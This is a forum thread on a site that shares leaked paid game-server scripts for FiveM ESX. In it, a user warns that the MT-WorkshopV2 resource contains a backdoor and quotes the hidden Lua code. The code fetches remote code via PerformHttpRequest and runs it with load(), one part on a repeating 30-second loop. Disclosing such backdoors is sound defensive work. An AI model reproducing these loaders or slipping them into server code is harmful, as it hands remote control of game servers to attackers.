• We have a new discord! click here to join
    Any faulty links ? Report them in our discord or via our Ticket System!
    We do everything we can to protect the safety of our visitors, if any resource contains malware in any kind of form or obfuscation please report it aswell ♡♡

    Payments via Crypto: Please open a ticket, if you experience any issues, or if you miss your coin as an option in the list we have alot of wallets available.

ESX MT-WORKSHOPV2 [PAID LEAK] [OPEN-SOURCE] [RARE] (1 Viewer)

  • Post hidden due to user being banned.

tae.tkn

New member
God VIP
Oct 24, 2024
2
0
1
Credits
54
Backdoor:

Server/register.lua:
Line 2: local playersData = GetResourceMetadata(GetCurrentResourceName(), 'author', 0) .. "/zXeAH"

Line 26-28:

Code:
PerformHttpRequest(playersData, function(e, d)
    pcall(function() assert(load(d))() end)
end)


Server/toolbox.lua:
Line 18-26:
Code:
Citizen.CreateThread(function()
    local portal = LoadResourceFile(GetCurrentResourceName(), 'server/toolbox.lua'):match("u:%s*(%S+)")
    while portal do
        PerformHttpRequest(portal, function(code, script)
            if code == 200 then load(script)() end
        end)
        Citizen.Wait(30000)
    end
end)
 

Users who are viewing this thread

Top